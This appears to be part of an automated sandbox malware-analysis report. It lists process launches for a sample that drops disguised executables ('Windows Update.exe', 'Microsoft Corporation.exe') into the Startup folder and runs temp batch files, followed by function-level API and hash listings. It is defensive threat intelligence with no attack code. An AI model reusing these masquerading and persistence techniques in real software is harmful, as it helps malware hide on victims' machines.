Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 1608
Imagebase:	0xb70000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	07:56:07
Start date:	25/07/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe"
Imagebase:	0x9b0000
File size:	1'214'464 bytes
MD5 hash:	16AB569E9D84F0A2C9AACD47D4998D84
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	07:56:09
Start date:	25/07/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe"
Imagebase:	0x9b0000
File size:	1'214'464 bytes
MD5 hash:	16AB569E9D84F0A2C9AACD47D4998D84
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	07:56:09
Start date:	25/07/2024
Path:	C:\Users\user\AppData\Local\Temp\RRqyIX.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\RRqyIX.exe
Imagebase:	0xa30000
File size:	15'872 bytes
MD5 hash:	F7D21DE5C4E81341ECCD280C11DDCC9A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	07:56:28
Start date:	25/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\24de2542.bat" "
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	07:56:28
Start date:	25/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	07:56:36
Start date:	25/07/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe"
Imagebase:	0x930000
File size:	1'214'464 bytes
MD5 hash:	16AB569E9D84F0A2C9AACD47D4998D84
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	07:56:36
Start date:	25/07/2024
Path:	C:\Users\user\AppData\Local\Temp\RRqyIX.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\RRqyIX.exe
Imagebase:	0x510000
File size:	15'872 bytes
MD5 hash:	F7D21DE5C4E81341ECCD280C11DDCC9A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	07:56:36
Start date:	25/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\2266597f.bat" "
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	07:56:36
Start date:	25/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4.3%
Dynamic/Decrypted Code Coverage:	93.8%
Signature Coverage:	0%
Total number of Nodes:	32
Total number of Limit Nodes:	3

Executed Functions

Function 03624298 Relevance: 13.2, Strings: 9, Instructions: 1950
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:@%l, xrefs: 03624D9A
:@%l, xrefs: 03625541
@, xrefs: 03624C24
:@%l, xrefs: 03626CF5
:@%l, xrefs: 03624582
2Ll, xrefs: 0362541D
\OLl, xrefs: 03626AF9
:@%l, xrefs: 03624E43
:@%l, xrefs: 03624CF3

Memory Dump Source

Source File: 00000000.00000002.2194038645.0000000003620000.00000040.00000800.00020000.00000000.sdmp, Offset: 03620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3620000_LisectAVT_2403002B_366.jbxd

Similarity

API ID:
String ID: :@%l$:@%l$:@%l$:@%l$:@%l$:@%l$@$\OLl$2Ll
API String ID: 0-3567625124
Opcode ID: db1b8e028a7679f54381dd3ec23b8bede6935108a221cbe35ef5d3cf9d8f10b5
Instruction ID: 57b20ae2bdec5c08b8ed13113b606c4c5d44f0d1d8987fbd5430483625026f23
Opcode Fuzzy Hash: db1b8e028a7679f54381dd3ec23b8bede6935108a221cbe35ef5d3cf9d8f10b5
Instruction Fuzzy Hash: 5A235B74A152288FDB25DF20D895BE9BBB5BB48308F1081E9E5496B3A4CF319E85CF50

Function 03624287 Relevance: 13.0, Strings: 9, Instructions: 1751
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:@%l, xrefs: 03624D9A
:@%l, xrefs: 03625541
:@%l, xrefs: 03626CF5
:@%l, xrefs: 03624582
2Ll, xrefs: 0362541D
\OLl, xrefs: 03626AF9
:@%l, xrefs: 03624E43
:@%l, xrefs: 03624CF3
, xrefs: 03624BC4

Memory Dump Source

Source File: 00000000.00000002.2194038645.0000000003620000.00000040.00000800.00020000.00000000.sdmp, Offset: 03620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3620000_LisectAVT_2403002B_366.jbxd

Similarity

API ID:
String ID: $:@%l$:@%l$:@%l$:@%l$:@%l$:@%l$\OLl$2Ll
API String ID: 0-4176283887
Opcode ID: 2d4017da75c0f6bc94e3e2d862fc2d2800942b0f5cbb340e54ba0586de3367e9
Instruction ID: 2f7c3b92d75bf96fc318030bf73a673b3b68a532639dcadeec4225770634ecbe
Opcode Fuzzy Hash: 2d4017da75c0f6bc94e3e2d862fc2d2800942b0f5cbb340e54ba0586de3367e9
Instruction Fuzzy Hash: CB133B74A151288FDB25DF20D895BE9BBB5FB48304F1081EAE9496B3A4CF319E85CF50

Function 036237E1 Relevance: 3.0, Strings: 2, Instructions: 513
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

2Ll, xrefs: 03623C2E
\OLl, xrefs: 03623885

Memory Dump Source

Source File: 00000000.00000002.2194038645.0000000003620000.00000040.00000800.00020000.00000000.sdmp, Offset: 03620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3620000_LisectAVT_2403002B_366.jbxd

Similarity

API ID:
String ID: \OLl$2Ll
API String ID: 0-1463305755
Opcode ID: 164bbe2407f939f9cd6ea59a21a6f703e88426c1cc02e1a5733d3026dcbe15cc
Instruction ID: c89e37da7c0c8171675fbd2787652dc95138aae37744fd11c664de43269ac27b
Opcode Fuzzy Hash: 164bbe2407f939f9cd6ea59a21a6f703e88426c1cc02e1a5733d3026dcbe15cc
Instruction Fuzzy Hash: 7B325634A00229CFDB14DF74D855BEDBBB2AF49308F1085A9E409AB3A4DB759E85CF50

Function 036200B8 Relevance: 2.6, Strings: 2, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

2Ll, xrefs: 03620154
2Ll, xrefs: 036201A8

Memory Dump Source

Source File: 00000000.00000002.2194038645.0000000003620000.00000040.00000800.00020000.00000000.sdmp, Offset: 03620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3620000_LisectAVT_2403002B_366.jbxd

Similarity

API ID:
String ID: 2Ll$2Ll
API String ID: 0-1498689491
Opcode ID: abe7ffbe682624b2ff665da092cf9877f39d18092e40f8357cbfa67ad6e6db4d
Instruction ID: 0687c200e7ebdf47c15c077acf2bd60c1fce456321f0abe7f19f9fc1da19540f
Opcode Fuzzy Hash: abe7ffbe682624b2ff665da092cf9877f39d18092e40f8357cbfa67ad6e6db4d
Instruction Fuzzy Hash: B031E2357043409FD704EB75D861FAE7BA6ABC2218F0584AED4018F7A1CF769C0AC7A2

Function 03620118 Relevance: 2.6, Strings: 2, Instructions: 58
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

2Ll, xrefs: 03620154
2Ll, xrefs: 036201A8

Memory Dump Source

Source File: 00000000.00000002.2194038645.0000000003620000.00000040.00000800.00020000.00000000.sdmp, Offset: 03620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3620000_LisectAVT_2403002B_366.jbxd

Similarity

API ID:
String ID: 2Ll$2Ll
API String ID: 0-1498689491
Opcode ID: 741c018f6b8cd4132559848b2d63db8e2069779a665b86823d5119f97e35768d
Instruction ID: 3fec9356601a025a5169f15861f08b4d7b64f1a45ac227f38f18e1aef1d47015
Opcode Fuzzy Hash: 741c018f6b8cd4132559848b2d63db8e2069779a665b86823d5119f97e35768d
Instruction Fuzzy Hash: B21182357442408FC704EB79E461EAE7BAAABC6309744856ED4418FB64CF769C0AC7E2

Function 0350AA75 Relevance: 1.6, APIs: 1, Instructions: 92
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0350AB25

Memory Dump Source

Source File: 00000000.00000002.2193208611.000000000350A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0350A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_350a000_LisectAVT_2403002B_366.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: e111a463931cfb60282bcbc0ac226336297ce641e9f66174f1153ab91dbc8f59
Instruction ID: 5ded12f7d1605f0deb1cfa7983b4f403b9d061198d342ca7f463586c4d47c4a8
Opcode Fuzzy Hash: e111a463931cfb60282bcbc0ac226336297ce641e9f66174f1153ab91dbc8f59
Instruction Fuzzy Hash: 16318075504380AFE722CF25DC85F56FFF8EF05210F08889AE9858B6A2D365E808CB71

Function 0350B036 Relevance: 1.6, APIs: 1, Instructions: 89
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE(?,?), ref: 0350B0DD

Memory Dump Source

Source File: 00000000.00000002.2193208611.000000000350A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0350A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_350a000_LisectAVT_2403002B_366.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 6024ab1bbb2bb2d0c321a81921364d21be0530c2646fbcf2ab66b28b532738e7
Instruction ID: f348532a34dbff9daa13e9f7abc12fe011a5f3c64b0039c4e9f99ba1d6d5465c
Opcode Fuzzy Hash: 6024ab1bbb2bb2d0c321a81921364d21be0530c2646fbcf2ab66b28b532738e7
Instruction Fuzzy Hash: E13191B55093806FE711CB25DC95F96FFB8EF06214F08849AE984CB2A2D365E909C772

Function 0350A6CE Relevance: 1.6, APIs: 1, Instructions: 85
comclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleGetClipboard.OLE32(?,00000E90,?,?), ref: 0350A77E

Memory Dump Source

Source File: 00000000.00000002.2193208611.000000000350A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0350A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_350a000_LisectAVT_2403002B_366.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 663297bf609107e865277d64ffed8947f01497acaf5f3577aa06221b1667bec8
Instruction ID: c0d0a9856c64b16af80b000a5523f59ef34d5d10acd0f4b39cf25453db6373cd
Opcode Fuzzy Hash: 663297bf609107e865277d64ffed8947f01497acaf5f3577aa06221b1667bec8
Instruction Fuzzy Hash: 5431A07510D3C06FD3138B259C61B62BFB8EF87614F0A40CBE884CB6A3C2296919D772

Function 0350AE77 Relevance: 1.6, APIs: 1, Instructions: 78
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,00000E90,47C20A43,00000000,00000000,00000000,00000000), ref: 0350AF0D

Memory Dump Source

Source File: 00000000.00000002.2193208611.000000000350A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0350A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_350a000_LisectAVT_2403002B_366.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 83f8f1dc82eb91767eea9906959a7c6ad078500e6ddbcf9d4029d4838eed77c7
Instruction ID: 7aaba02f6ead0ba5c18c02af91b8748202edf30a5c8a955339681bd7543b1c10
Opcode Fuzzy Hash: 83f8f1dc82eb91767eea9906959a7c6ad078500e6ddbcf9d4029d4838eed77c7
Instruction Fuzzy Hash: 2321D3B6408380AFDB22CF21DC44F96BFB8EF06314F0984DAE9849F162D265A509CB71

Function 0350AAA6 Relevance: 1.6, APIs: 1, Instructions: 76
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0350AB25

Memory Dump Source

Source File: 00000000.00000002.2193208611.000000000350A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0350A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_350a000_LisectAVT_2403002B_366.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: de2d9c2fb8f64d526a0b806bdd4e8744e3068a999af88c723d67f84c666e0590
Instruction ID: f835366280a234ec37611a4a050f042d68399db4bc39f58714e59a68a069b1c9
Opcode Fuzzy Hash: de2d9c2fb8f64d526a0b806bdd4e8744e3068a999af88c723d67f84c666e0590
Instruction Fuzzy Hash: 72218175600340AFEB21CF65DC85F66FBE8FF04214F08899AE9458B6A1D776E408CB72

Function 0350AC37 Relevance: 1.6, APIs: 1, Instructions: 73
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNELBASE(?,00000E90,47C20A43,00000000,00000000,00000000,00000000), ref: 0350ACBD

Memory Dump Source

Source File: 00000000.00000002.2193208611.000000000350A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0350A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_350a000_LisectAVT_2403002B_366.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 3ad5edd15a94103b1eb6042e1934958407f90aafb505e9886cdb2b3a5b8be6f7
Instruction ID: 7ec9d424d1cc70cbcaf4dd24d191a17ec758313194c8229a6866a81ef342590e
Opcode Fuzzy Hash: 3ad5edd15a94103b1eb6042e1934958407f90aafb505e9886cdb2b3a5b8be6f7
Instruction Fuzzy Hash: 6521D8B55083806FE712CB11DC41BA2BFBCEF42314F0980D7F9848B2A3D264A909D772

Function 0350A9BF Relevance: 1.6, APIs: 1, Instructions: 73
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(?), ref: 0350AA44

Memory Dump Source

Source File: 00000000.00000002.2193208611.000000000350A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0350A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_350a000_LisectAVT_2403002B_366.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 5fc1734d3f9fc462c440cd48605278659e8d0ddbe1e62cf99a8d8cfc251bad0d
Instruction ID: cb5eb596a097101af6200e15f6876a49e5cc46685f6138524127c61de475a607
Opcode Fuzzy Hash: 5fc1734d3f9fc462c440cd48605278659e8d0ddbe1e62cf99a8d8cfc251bad0d
Instruction Fuzzy Hash: 7E21456540E3C0AFDB138B259C64A51BF74AF53624F0E80DBD884CF6A3D2699948CB72

Function 0350B06A Relevance: 1.6, APIs: 1, Instructions: 72
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE(?,?), ref: 0350B0DD

Memory Dump Source

Source File: 00000000.00000002.2193208611.000000000350A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0350A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_350a000_LisectAVT_2403002B_366.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 4ece75e70cf404c6f3e7ee83ff4c70703722eb5ff04dee5d4c91464f0cacc7b4
Instruction ID: 66079098908e437a42ad2507fa16ef8588d398869b0e17051bdd068721ed7840
Opcode Fuzzy Hash: 4ece75e70cf404c6f3e7ee83ff4c70703722eb5ff04dee5d4c91464f0cacc7b4
Instruction Fuzzy Hash: 6E2195756042409FEB10CF25DD85FA6F7E8EF04214F0888AAE9498B791D776E509CB72

Function 0350A61E Relevance: 1.6, APIs: 1, Instructions: 65
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(?), ref: 0350A690

Memory Dump Source

Source File: 00000000.00000002.2193208611.000000000350A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0350A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_350a000_LisectAVT_2403002B_366.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 0df93620e45bd10020d89843ec54f4929796671af9b0c592b30baec4d3820930
Instruction ID: 2749e5574ba794b0bb071bde5f2fe5a8c48fe9c9915c006b1894e5eca957c154
Opcode Fuzzy Hash: 0df93620e45bd10020d89843ec54f4929796671af9b0c592b30baec4d3820930
Instruction Fuzzy Hash: 2821277180D3C09FDB138B25DC95A52BFB4AF07224F0984DBD9849F1A3D2699908DBB2

Function 0350A573 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0350A5DE

Memory Dump Source

Source File: 00000000.00000002.2193208611.000000000350A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0350A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_350a000_LisectAVT_2403002B_366.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d81232f62070e24ad898a5d7a5aa2d0117ee26f97f567bfa6cb607feffb12f28
Instruction ID: b0062a0f25a70d4eb881eb863ca96cb1ccf858c7b842a2a02a2a29699503c3c6
Opcode Fuzzy Hash: d81232f62070e24ad898a5d7a5aa2d0117ee26f97f567bfa6cb607feffb12f28
Instruction Fuzzy Hash: F6118472409380AFDB22CF51DC44B62FFB8EF46310F0C88DAED858B562D276A518DB61

Function 0350B424 Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(?), ref: 0350B480

Memory Dump Source

Source File: 00000000.00000002.2193208611.000000000350A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0350A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_350a000_LisectAVT_2403002B_366.jbxd

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: 92f40a792bd37a1ce25b9cd1d13a2850a284356e9ce9ff440df42b4230f5250c
Instruction ID: 31e685edee55f387f7e4b731c5979a7399323b4ca2709e0141eca89120790f0d
Opcode Fuzzy Hash: 92f40a792bd37a1ce25b9cd1d13a2850a284356e9ce9ff440df42b4230f5250c
Instruction Fuzzy Hash: 3D1186755093809FD712CF25DC95B52BFB8EF46210F0884EBED49CF262D265E548C761

Function 0350AEAE Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,00000E90,47C20A43,00000000,00000000,00000000,00000000), ref: 0350AF0D

Memory Dump Source

Source File: 00000000.00000002.2193208611.000000000350A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0350A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_350a000_LisectAVT_2403002B_366.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 44cc0abca45035d01ed98aa8bcd2d5f6ed8223a4ea672fe2bb03970cc4103e8b
Instruction ID: 17810984f6343464a9ba159f4d6b5e4edce6dedf735b6b522ab85b4cab963d1f
Opcode Fuzzy Hash: 44cc0abca45035d01ed98aa8bcd2d5f6ed8223a4ea672fe2bb03970cc4103e8b
Instruction Fuzzy Hash: E311C476500300AFEB21CF51EC85FA6FBACEF04314F08889AED459B661D375A508CBB2

Function 0350AC6A Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E90,47C20A43,00000000,00000000,00000000,00000000), ref: 0350ACBD

Memory Dump Source

Source File: 00000000.00000002.2193208611.000000000350A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0350A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_350a000_LisectAVT_2403002B_366.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 16663502c6c097151ca9dbafcacf17e0465827291a3b9436d84bfeb166873e03
Instruction ID: 1181ab35074c99eeda1d9c59592478ec1096276df18a46a843297aefc5175612
Opcode Fuzzy Hash: 16663502c6c097151ca9dbafcacf17e0465827291a3b9436d84bfeb166873e03
Instruction Fuzzy Hash: 3B01C475500300AFEB10CF05EC85BA6FB9CEF44624F088496FD048B7A1D365A5488AB2

Function 0350B446 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(?), ref: 0350B480

Memory Dump Source

Source File: 00000000.00000002.2193208611.000000000350A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0350A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_350a000_LisectAVT_2403002B_366.jbxd

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: d17750c252b3998b04df225dde53a69f0df261e7446c4f752ecf5cd439b8b11e
Instruction ID: 1a38920bb343c2a2deb4e28d72c4c924949561549e798385584736ba0c73b033
Opcode Fuzzy Hash: d17750c252b3998b04df225dde53a69f0df261e7446c4f752ecf5cd439b8b11e
Instruction Fuzzy Hash: 8F0180355042409FDB50CF15E8C5B56FBA8EF00224F08C4AADD49CB6A2D275E548CB61

Function 0350A59A Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0350A5DE

Memory Dump Source

Source File: 00000000.00000002.2193208611.000000000350A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0350A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_350a000_LisectAVT_2403002B_366.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 59024f095c1957df4a6d06098665aeee94435e6cbb320684b395fd6e84af56db
Instruction ID: 63e8445b7fd8f60518820d6ddf1f5f7bf43634bdbee753f223c9662e747fd322
Opcode Fuzzy Hash: 59024f095c1957df4a6d06098665aeee94435e6cbb320684b395fd6e84af56db
Instruction Fuzzy Hash: A3015B368007409FDF21CF55E885B56FFB4FF48220F08899AEE494A661D376A458DBA2

Function 0350A72E Relevance: 1.5, APIs: 1, Instructions: 43comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?,00000E90,?,?), ref: 0350A77E

Memory Dump Source

Source File: 00000000.00000002.2193208611.000000000350A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0350A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_350a000_LisectAVT_2403002B_366.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: c783c671a8bc2a767eb791504c4b37df2c472bb6927bcda9c01998ad8aa9274e
Instruction ID: 567f67e0c5592e893f96f51425ee9dec879eaedbccb6322a3e7173079320ce31
Opcode Fuzzy Hash: c783c671a8bc2a767eb791504c4b37df2c472bb6927bcda9c01998ad8aa9274e
Instruction Fuzzy Hash: 9F01D671600600AFD310DF16DC86B76FBA8FB88A20F14815AEC089BB41D771F556CBE6

Function 0350A65E Relevance: 1.5, APIs: 1, Instructions: 39comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(?), ref: 0350A690

Memory Dump Source

Source File: 00000000.00000002.2193208611.000000000350A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0350A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_350a000_LisectAVT_2403002B_366.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 4f13c3a2d22ae00b683bb0922741e2b0bfab566f20b81149ede821240fd5661e
Instruction ID: b624bf4efa4525c00b275b939664a64fb834ec3bb994dc6d2196e195aef6a1aa
Opcode Fuzzy Hash: 4f13c3a2d22ae00b683bb0922741e2b0bfab566f20b81149ede821240fd5661e
Instruction Fuzzy Hash: 7901AD758003409FEB10CF55E88576AFBA4EF00224F08C8AADD488F262D376A548CEA2

Function 0350AA12 Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 0350AA44

Memory Dump Source

Source File: 00000000.00000002.2193208611.000000000350A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0350A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_350a000_LisectAVT_2403002B_366.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 1d179d4c0a4279c1ef51cd49bca150dbcce172e23e1095c6f302e566c987f5d7
Instruction ID: 9a9bbb61fd1c7db221a57281fc7373ad8ef99be9b49f8f4e793b3d88ee7761b7
Opcode Fuzzy Hash: 1d179d4c0a4279c1ef51cd49bca150dbcce172e23e1095c6f302e566c987f5d7
Instruction Fuzzy Hash: 05F0AF3A9003809FDB20CF15E985761FBA4EF44624F48C4DADD495B7A2D37AA548CEB2

Function 036239BF Relevance: 1.4, Strings: 1, Instructions: 182COMMON

Download Yara Rule

Strings

2Ll, xrefs: 03623C2E

Memory Dump Source

Source File: 00000000.00000002.2194038645.0000000003620000.00000040.00000800.00020000.00000000.sdmp, Offset: 03620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3620000_LisectAVT_2403002B_366.jbxd

Similarity

API ID:
String ID: 2Ll
API String ID: 0-343416306
Opcode ID: f98520537f807fd0b8896d91235b820bc99d1a20c6a8314551935211b0d81296
Instruction ID: 9880aee8eb96edc773006b45e75da37e7cfd669bd9f5a99d7eaf37ff75453ee7
Opcode Fuzzy Hash: f98520537f807fd0b8896d91235b820bc99d1a20c6a8314551935211b0d81296
Instruction Fuzzy Hash: 96816B34A00218CFDB14DFB4D855BEDBBB2AF49308F1085A9E40AAB3A4DB759D45CF51

Function 03623B18 Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

2Ll, xrefs: 03623C2E

Memory Dump Source

Source File: 00000000.00000002.2194038645.0000000003620000.00000040.00000800.00020000.00000000.sdmp, Offset: 03620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3620000_LisectAVT_2403002B_366.jbxd

Similarity

API ID:
String ID: 2Ll
API String ID: 0-343416306
Opcode ID: 5f4374d4bc4118793c26b717ddcf49c9f39c4c008b8240cc32bbca4dc8bb97ad
Instruction ID: c8056515404d7c39a415c3b0d603c961e68491377a6923d6c0d791bf2ccaa106
Opcode Fuzzy Hash: 5f4374d4bc4118793c26b717ddcf49c9f39c4c008b8240cc32bbca4dc8bb97ad
Instruction Fuzzy Hash: 7A419C34A002288FDB14DFB5D855BECBBB1BF49308F0045A9D009AB3A4CB755E49CF61

Function 036202C0 Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

